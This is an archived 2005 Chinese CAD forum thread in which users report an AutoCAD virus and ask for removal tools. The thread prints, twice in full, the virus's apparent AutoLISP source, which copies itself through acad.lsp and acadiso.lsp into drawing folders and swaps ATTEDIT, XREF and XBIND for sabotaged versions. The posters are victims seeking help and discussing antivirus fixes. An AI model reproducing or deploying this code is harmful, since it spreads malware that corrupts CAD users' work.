发现cad病毒

min_zxm 发表于 2005-9-16 19:32:00

cad病毒，求高手提供查杀工具
据说这是该病毒的部分源代码
(defun s::startup (/ old_cmd path dwgpath mnlpath apppath oldacad      newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2      )   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (setq path (findfile "base.dcl"))   (setq path (substr path 1 (- (strlen path) 8)))   (setq mnlpath (getvar "menuname"))   (setq nowdwg (getvar "dwgname"))   (setq wjqm (findfile nowdwg))   (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))   (setq acadpath (findfile "acad.lsp"))   (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))   (setq ns1 ""  ns2 ""  )   (setq lspbj 0)   (setq wjqm (strcat path "acad.lsp"))   (if (setq wjm (open wjqm "r"))     (progn (while (setq wz (read-line wjm))       (setq ns1 ns2)       (setq ns2 wz)       )     (if (> (strlen ns1) 14)       (if (= (substr ns1 8 7) "acadiso")         (setq lspbj 1)         )       )     (close wjm)     )     )   (if (and (= acadpath dwgpath) (/= acadpath path))     (progn (setq oldacad (findfile "acad.lsp"))     (setq newacad (strcat path "acadiso.lsp"))     (if (= lspbj 0)       (progn (setq wjqm (strcat path "acad.lsp"))       (setq wjm (open wjqm "a"))       (write-line         (strcat "(load" (chr 34) "acadiso" (chr 34) ")")                       wjm         )       (write-line "(princ)" wjm)       (close wjm)       )       )     (writeapp)     )     (progn (if (/= nowdwg "Drawing.dwg")       (progn (setq oldacad (findfile "acadiso.lsp"))       (setq newacad (strcat dwgpath "acad.lsp"))       (writeapp)       )       )     )     )   (command "undefine" "attedit")   (command "undefine" "xref")   (command "undefine" "xbind")   (setvar "cmdecho" old_cmd)   (princ)   ) (defun writeapp ()   (if (setq wjm1 (open newacad "w"))     (progn (setq wjm (open oldacad "r"))     (while (setq wz (read-line wjm)) (write-line wz wjm1))     (close wjm)     (close wjm1)     )     )   ) (defun C:attedit (/ p cont old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (setq p (ssget))   (if p     (progn (setq cont (sslength p))     (princ "\nSeltct objects:")     (princ cont)     (princ "found")     (princ "\n")     (princ cont)     (princ " was not able to be attedit")     )     )   (setvar "cmdecho" old_cmd)   (princ)   ) (defun C:xref (/ old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (command "insert")   (setvar "cmdecho" old_cmd)   (princ)   ) (defun C:xbind (/ old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (command "insert")   (setvar "cmdecho" old_cmd)   (princ)   ) (defun C:Burst (/ p old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (princ "\nBURST----将图块中的文字炸开后成为实体")   (setq p (ssget))   (setvar "cmdecho" old_cmd)   (princ)   ) (princ) (DEFUN C:BB () (princ "select the point to be break") (COMMAND "BREAK"pause "F" pause "@0,0") (PRINC)) (DEFUN C:BR () (princ "select the point to be break") (COMMAND "BREAK"pause "F") (PRINC)) (defun C:CC (/ ss FL)  (princ "\nSelect objects: ")  (setq ss (ssget))  (setq n (sslength ss))  (command "COPY" ss "" "m" "") (repeat n (command "" copy "" "")) ) (DEFUN C:DD () (COMMAND "DDATTE") (PRINC)) (DEFUN C:d () (COMMAND "DIST") (PRINC)) (DEFUN C:DT () (COMMAND "DTEXT") (PRINC)) ;;;==========================================================================
;;;========================================================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; --------------------- BONUS ERROR HANDLER ----------------------
(defun init_bonus_error ( lst / ss undo_init)     ;;;;;;;local function;;;;;;;;;;;;;;;;;;;;   (defun undo_init ( / undo_ctl)    (b_set_sysvars (list "cmdecho" 0))    (setq undo_ctl (getvar "undoctl"))    (if (equal 0 (getvar "UNDOCTL")) ;Make sure undo is fully enabled.        (command "_.undo" "_all")    )    (if (or (not (equal 1 (logand 1 (getvar "UNDOCTL"))))             (equal 2 (logand 2 (getvar "UNDOCTL")))        );or        (command "_.undo" "_control" "_all")    )        ;Ensure undo auto is off    (if (equal 4 (logand 4 (getvar "undoctl")))        (command "_.undo" "_Auto" "_off")

MJTD_7777 发表于 2005-9-19 09:10:00

真长。，

武鸣惠众 发表于 2005-12-23 16:29:00

cad病毒，求高手提供查杀工具
据说这是该病毒的部分源代码
(defun s::startup (/ old_cmd path dwgpath mnlpath apppath oldacad      newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2      )   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (setq path (findfile "base.dcl"))   (setq path (substr path 1 (- (strlen path) 8)))   (setq mnlpath (getvar "menuname"))   (setq nowdwg (getvar "dwgname"))   (setq wjqm (findfile nowdwg))   (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))   (setq acadpath (findfile "acad.lsp"))   (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))   (setq ns1 ""  ns2 ""  )   (setq lspbj 0)   (setq wjqm (strcat path "acad.lsp"))   (if (setq wjm (open wjqm "r"))     (progn (while (setq wz (read-line wjm))       (setq ns1 ns2)       (setq ns2 wz)       )     (if (> (strlen ns1) 14)       (if (= (substr ns1 8 7) "acadiso")         (setq lspbj 1)         )       )     (close wjm)     )     )   (if (and (= acadpath dwgpath) (/= acadpath path))     (progn (setq oldacad (findfile "acad.lsp"))     (setq newacad (strcat path "acadiso.lsp"))     (if (= lspbj 0)       (progn (setq wjqm (strcat path "acad.lsp"))       (setq wjm (open wjqm "a"))       (write-line         (strcat "(load" (chr 34) "acadiso" (chr 34) ")")                       wjm         )       (write-line "(princ)" wjm)       (close wjm)       )       )     (writeapp)     )     (progn (if (/= nowdwg "Drawing.dwg")       (progn (setq oldacad (findfile "acadiso.lsp"))       (setq newacad (strcat dwgpath "acad.lsp"))       (writeapp)       )       )     )     )   (command "undefine" "attedit")   (command "undefine" "xref")   (command "undefine" "xbind")   (setvar "cmdecho" old_cmd)   (princ)   ) (defun writeapp ()   (if (setq wjm1 (open newacad "w"))     (progn (setq wjm (open oldacad "r"))     (while (setq wz (read-line wjm)) (write-line wz wjm1))     (close wjm)     (close wjm1)     )     )   ) (defun C:attedit (/ p cont old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (setq p (ssget))   (if p     (progn (setq cont (sslength p))     (princ "\nSeltct objects:")     (princ cont)     (princ "found")     (princ "\n")     (princ cont)     (princ " was not able to be attedit")     )     )   (setvar "cmdecho" old_cmd)   (princ)   ) (defun C:xref (/ old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (command "insert")   (setvar "cmdecho" old_cmd)   (princ)   ) (defun C:xbind (/ old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (command "insert")   (setvar "cmdecho" old_cmd)   (princ)   ) (defun C:Burst (/ p old_cmd)   (setq old_cmd (getvar "cmdecho"))   (setvar "cmdecho" 0)   (princ "\nBURST----将图块中的文字炸开后成为实体")  (setq p (ssget))  (setvar "cmdecho" old_cmd)  (princ)   )(princ) (DEFUN C:BB () (princ "select the point to be break") (COMMAND "BREAK"pause "F" pause "@0,0") (PRINC)) (DEFUN C:BR () (princ "select the point to be break") (COMMAND "BREAK"pause "F") (PRINC)) (defun C:CC (/ ss FL)  (princ "\nSelect objects: ")  (setq ss (ssget))  (setq n (sslength ss))  (command "COPY" ss "" "m" "") (repeat n (command "" copy "" "")) ) (DEFUN C:DD () (COMMAND "DDATTE") (PRINC)) (DEFUN C:d () (COMMAND "DIST") (PRINC)) (DEFUN C:DT () (COMMAND "DTEXT") (PRINC)) ;;;==========================================================================
;;;========================================================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; --------------------- BONUS ERROR HANDLER ----------------------
(defun init_bonus_error ( lst / ss undo_init)     ;;;;;;;local function;;;;;;;;;;;;;;;;;;;;   (defun undo_init ( / undo_ctl)    (b_set_sysvars (list "cmdecho" 0))    (setq undo_ctl (getvar "undoctl"))    (if (equal 0 (getvar "UNDOCTL")) ;Make sure undo is fully enabled.        (command "_.undo" "_all")    )    (if (or (not (equal 1 (logand 1 (getvar "UNDOCTL"))))             (equal 2 (logand 2 (getvar "UNDOCTL")))        );or        (command "_.undo" "_control" "_all")    )        ;Ensure undo auto is off    (if (equal 4 (logand 4 (getvar "undoctl")))        (command "_.undo" "_Auto" "_off") 
这个用瑞星杀毒软件杀就可以,以前我也出现过,后用瑞星杀后就行了

ZOYSIA 发表于 2005-12-26 10:13:00

我用的是诺顿，这几天经常会遇到acad.lisp文件是病毒的信息，怎么回事？以前就没事。还有为什么会自动跑出来一个.lisp文件呢？

BigJue 发表于 2005-12-26 14:50:00

大家一定要提高警惕了~~~~

linyiwq 发表于 2005-12-26 17:21:00

这些人真的很变态呀！！！！

页: [1]

明经CAD社区's Archiver

发现cad病毒